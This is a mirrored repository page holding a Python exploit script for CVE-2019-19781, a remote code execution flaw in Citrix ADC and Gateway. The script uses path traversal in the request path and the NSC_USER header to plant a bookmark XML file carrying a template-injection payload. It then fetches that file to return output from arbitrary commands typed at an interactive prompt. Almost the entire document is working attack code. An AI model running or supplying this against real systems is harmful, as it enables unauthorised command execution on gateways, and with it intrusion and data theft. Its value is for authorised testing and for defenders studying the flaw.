mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 10:26:09 +00:00
48 lines
1.8 KiB
Python
48 lines
1.8 KiB
Python
|
#!/usr/bin/env python
|
||
|
import requests
|
||
|
import string
|
||
|
import random
|
||
|
import re
|
||
|
import sys
|
||
|
from requests.packages.urllib3.exceptions import InsecureRequestWarning
|
||
|
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
|
||
|
|
||
|
print("CVE-2019-19781 - Remote Code Execution in Citrix Application Delivery Controller and Citrix Gateway")
|
||
|
print("Found by Mikhail Klyuchnikov")
|
||
|
print("")
|
||
|
|
||
|
if len(sys.argv) < 2:
|
||
|
print("[-] No URL provided")
|
||
|
sys.exit(0)
|
||
|
|
||
|
while True:
|
||
|
try:
|
||
|
command = input("command > ")
|
||
|
|
||
|
random_xml = ''.join(random.choices(string.ascii_uppercase + string.digits, k=12))
|
||
|
print("[+] Adding bookmark", random_xml + ".xml")
|
||
|
|
||
|
burp0_url = sys.argv[1] + "/vpn/../vpns/portal/scripts/newbm.pl"
|
||
|
burp0_headers = {"NSC_USER": "../../../../netscaler/portal/templates/" +
|
||
|
random_xml, "NSC_NONCE": "c", "Connection": "close"}
|
||
|
burp0_data = {"url": "http://exemple.com", "title": "[%t=template.new({'BLOCK'='print `" + str(command) + "`'})%][ % t % ]", "desc": "test", "UI_inuse": "RfWeb"}
|
||
|
r = requests.post(burp0_url, headers=burp0_headers, data=burp0_data,verify=False)
|
||
|
|
||
|
if r.status_code == 200:
|
||
|
print("[+] Bookmark added")
|
||
|
else:
|
||
|
print("\n[-] Target not vulnerable or something went wrong")
|
||
|
sys.exit(0)
|
||
|
|
||
|
burp0_url = sys.argv[1] + "/vpns/portal/" + random_xml + ".xml"
|
||
|
burp0_headers = {"NSC_USER": "../../../../netscaler/portal/templates/" +
|
||
|
random_xml, "NSC_NONCE": "c", "Connection": "close"}
|
||
|
r = requests.get(burp0_url, headers=burp0_headers,verify=False)
|
||
|
|
||
|
replaced = re.sub('^&#.* $', '', r.text, flags=re.MULTILINE)
|
||
|
print("[+] Result of the command: \n")
|
||
|
print(replaced)
|
||
|
|
||
|
except KeyboardInterrupt:
|
||
|
print("Exiting...")
|
||
|
break
|